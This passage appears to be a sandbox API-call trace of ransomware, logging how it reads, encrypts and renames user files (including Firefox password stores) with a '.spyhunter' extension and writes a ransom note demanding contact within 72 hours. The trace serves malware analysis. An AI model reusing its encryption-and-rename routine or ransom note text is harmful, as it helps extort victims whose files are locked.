(lpFirst="Dv8YHPtnDklF.mkv", lpSrch=".txt") returned 0x0 [0149.786] GetProcessHeap () returned 0x2c0000 [0149.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.786] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eeac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248eeac*=0x2800, lpOverlapped=0x0) returned 1 [0149.786] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.786] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248eeac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248eeac*=0x2800, lpOverlapped=0x0) returned 1 [0149.787] GetProcessHeap () returned 0x2c0000 [0149.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.787] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.787] WriteFile (in: hFile=0x178, lpBuffer=0x248eeec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eeac, lpOverlapped=0x0 | out: lpBuffer=0x248eeec*, lpNumberOfBytesWritten=0x248eeac*=0x4, lpOverlapped=0x0) returned 1 [0149.787] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eeac, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248eeac*=0x30, lpOverlapped=0x0) returned 1 [0149.787] CloseHandle (hObject=0x178) returned 1 [0149.787] GetProcessHeap () returned 0x2c0000 [0149.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0149.787] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Dv8YHPtnDklF.mkv.spyhunter") returned 68 [0149.787] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Dv8YHPtnDklF.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dv8yhptndklf.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Dv8YHPtnDklF.mkv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dv8yhptndklf.mkv.spyhunter")) returned 1 [0149.788] GetProcessHeap () returned 0x2c0000 [0149.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0149.788] GetProcessHeap () returned 0x2c0000 [0149.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0149.788] GetProcessHeap () returned 0x2c0000 [0149.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2cbb8 | out: hHeap=0x2c0000) returned 1 [0149.788] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eee8 | out: pbBuffer=0x248eee8) returned 1 [0149.788] GetProcessHeap () returned 0x2c0000 [0149.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0149.788] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248eee0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248eee0*=0x30) returned 1 [0149.847] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DS_SMl.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ds_sml.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0149.848] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DS_SMl.gif") returned 52 [0149.848] StrStrW (lpFirst="DS_SMl.gif", lpSrch=".txt") returned 0x0 [0149.848] GetProcessHeap () returned 0x2c0000 [0149.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0149.848] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eea4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248eea4*=0x2800, lpOverlapped=0x0) returned 1 [0149.849] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.849] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248eea4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248eea4*=0x2800, lpOverlapped=0x0) returned 1 [0149.860] GetProcessHeap () returned 0x2c0000 [0149.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0149.860] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.860] WriteFile (in: hFile=0xb0, lpBuffer=0x248eee4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eea4, lpOverlapped=0x0 | out: lpBuffer=0x248eee4*, lpNumberOfBytesWritten=0x248eea4*=0x4, lpOverlapped=0x0) returned 1 [0149.860] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eea4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248eea4*=0x30, lpOverlapped=0x0) returned 1 [0149.860] CloseHandle (hObject=0xb0) returned 1 [0149.860] GetProcessHeap () returned 0x2c0000 [0149.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0149.861] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DS_SMl.gif.spyhunter") returned 62 [0149.861] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DS_SMl.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ds_sml.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DS_SMl.gif.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ds_sml.gif.spyhunter")) returned 1 [0149.862] GetProcessHeap () returned 0x2c0000 [0149.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0149.862] GetProcessHeap () returned 0x2c0000 [0149.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0149.862] GetProcessHeap () returned 0x2c0000 [0149.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec1ee8 | out: hHeap=0x2c0000) returned 1 [0149.862] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eee8 | out: pbBuffer=0x248eee8) returned 1 [0149.862] GetProcessHeap () returned 0x2c0000 [0149.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0149.862] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248eee0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248eee0*=0x30) returned 1 [0149.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0149.863] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact") returned 64 [0149.863] StrStrW (lpFirst="asdlfk poopvy.contact", lpSrch=".txt") returned 0x0 [0149.863] GetProcessHeap () returned 0x2c0000 [0149.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0149.863] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248eea4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248eea4*=0x493, lpOverlapped=0x0) returned 1 [0150.112] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffb6d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.112] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x493, lpNumberOfBytesWritten=0x248eea4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248eea4*=0x493, lpOverlapped=0x0) returned 1 [0150.112] GetProcessHeap () returned 0x2c0000 [0150.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0150.112] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.112] WriteFile (in: hFile=0xb0, lpBuffer=0x248eee4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248eea4, lpOverlapped=0x0 | out: lpBuffer=0x248eee4*, lpNumberOfBytesWritten=0x248eea4*=0x4, lpOverlapped=0x0) returned 1 [0150.112] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248eea4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248eea4*=0x30, lpOverlapped=0x0) returned 1 [0150.112] CloseHandle (hObject=0xb0) returned 1 [0150.112] GetProcessHeap () returned 0x2c0000 [0150.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0150.112] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.spyhunter") returned 74 [0150.113] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.spyhunter")) returned 1 [0150.113] GetProcessHeap () returned 0x2c0000 [0150.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0150.113] GetProcessHeap () returned 0x2c0000 [0150.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0150.113] GetProcessHeap () returned 0x2c0000 [0150.113] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e08c98 | out: hHeap=0x2c0000) returned 1 [0150.113] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eee0 | out: pbBuffer=0x248eee0) returned 1 [0150.113] GetProcessHeap () returned 0x2c0000 [0150.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0150.113] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248eed8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248eed8*=0x30) returned 1 [0150.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yNbV6aIjC4N9lIE.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ynbv6aijc4n9lie.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0150.114] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yNbV6aIjC4N9lIE.ods") returned 69 [0150.114] StrStrW (lpFirst="yNbV6aIjC4N9lIE.ods", lpSrch=".txt") returned 0x0 [0150.114] GetProcessHeap () returned 0x2c0000 [0150.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0150.114] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee9c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ee9c*=0x2800, lpOverlapped=0x0) returned 1 [0150.115] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.115] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ee9c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ee9c*=0x2800, lpOverlapped=0x0) returned 1 [0150.115] GetProcessHeap () returned 0x2c0000 [0150.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0150.115] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.115] WriteFile (in: hFile=0xb0, lpBuffer=0x248eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee9c, lpOverlapped=0x0 | out: lpBuffer=0x248eedc*, lpNumberOfBytesWritten=0x248ee9c*=0x4, lpOverlapped=0x0) returned 1 [0150.115] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee9c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee9c*=0x30, lpOverlapped=0x0) returned 1 [0150.115] CloseHandle (hObject=0xb0) returned 1 [0150.267] GetProcessHeap () returned 0x2c0000 [0150.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0150.268] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yNbV6aIjC4N9lIE.ods.spyhunter") returned 79 [0150.268] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yNbV6aIjC4N9lIE.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ynbv6aijc4n9lie.ods"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yNbV6aIjC4N9lIE.ods.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ynbv6aijc4n9lie.ods.spyhunter")) returned 1 [0150.331] GetProcessHeap () returned 0x2c0000 [0150.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0150.332] GetProcessHeap () returned 0x2c0000 [0150.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0150.332] GetProcessHeap () returned 0x2c0000 [0150.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c81a50 | out: hHeap=0x2c0000) returned 1 [0150.332] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0150.398] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0150.399] WriteFile (in: hFile=0xa0, lpBuffer=0x248ee13*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ef3c, lpOverlapped=0x0 | out: lpBuffer=0x248ee13*, lpNumberOfBytesWritten=0x248ef3c*=0x127, lpOverlapped=0x0) returned 1 [0150.399] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0150.400] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ef3c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ef3c*=0x2ac, lpOverlapped=0x0) returned 1 [0150.400] CloseHandle (hObject=0xa0) returned 1 [0150.400] GetProcessHeap () returned 0x2c0000 [0150.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc12d0 | out: hHeap=0x2c0000) returned 1 [0150.400] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eed8 | out: pbBuffer=0x248eed8) returned 1 [0150.400] GetProcessHeap () returned 0x2c0000 [0150.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0150.400] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248eed0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248eed0*=0x30) returned 1 [0150.400] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\signons.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0150.401] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite") returned 106 [0150.401] StrStrW (lpFirst="signons.sqlite", lpSrch=".txt") returned 0x0 [0150.401] GetProcessHeap () returned 0x2c0000 [0150.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0150.401] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee94, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248ee94*=0x2800, lpOverlapped=0x0) returned 1 [0150.505] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.506] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ee94, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248ee94*=0x2800, lpOverlapped=0x0) returned 1 [0150.506] GetProcessHeap () returned 0x2c0000 [0150.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0150.506] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.506] WriteFile (in: hFile=0xa0, lpBuffer=0x248eed4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee94, lpOverlapped=0x0 | out: lpBuffer=0x248eed4*, lpNumberOfBytesWritten=0x248ee94*=0x4, lpOverlapped=0x0) returned 1 [0150.507] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee94, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee94*=0x30, lpOverlapped=0x0) returned 1 [0150.507] CloseHandle (hObject=0xa0) returned 1 [0150.552] GetProcessHeap () returned 0x2c0000 [0150.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0150.552] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite.spyhunter") returned 116 [0150.552] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\signons.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\signons.sqlite.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\signons.sqlite.spyhunter")) returned 1 [0150.553] GetProcessHeap () returned 0x2c0000 [0150.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0150.553] GetProcessHeap () returned 0x2c0000 [0150.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0150.554] GetProcessHeap () returned 0x2c0000 [0150.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc11a8 | out: hHeap=0x2c0000) returned 1 [0150.554] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248eed8 | out: pbBuffer=0x248eed8) returned 1 [0150.554] GetProcessHeap () returned 0x2c0000 [0150.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0150.554] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248eed0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248eed0*=0x30) returned 1 [0150.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\secmod.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0150.555] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db") returned 101 [0150.555] StrStrW (lpFirst="secmod.db", lpSrch=".txt") returned 0x0 [0150.555] GetProcessHeap () returned 0x2c0000 [0150.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0150.555] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ee94, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ee94*=0x2800, lpOverlapped=0x0) returned 1 [0150.596] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.596] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ee94, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ee94*=0x2800, lpOverlapped=0x0) returned 1 [0150.597] GetProcessHeap () returned 0x2c0000 [0150.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0150.597] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.597] WriteFile (in: hFile=0xa0, lpBuffer=0x248eed4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ee94, lpOverlapped=0x0 | out: lpBuffer=0x248eed4*, lpNumberOfBytesWritten=0x248ee94*=0x4, lpOverlapped=0x0) returned 1 [0150.597] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ee94, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248ee94*=0x30, lpOverlapped=0x0) returned 1 [0150.597] CloseHandle (hObject=0xa0) returned 1 [0150.597] GetProcessHeap () returned 0x2c0000 [0150.597] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0150.597] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db.spyhunter") returned 111 [0150.598] MoveFileW 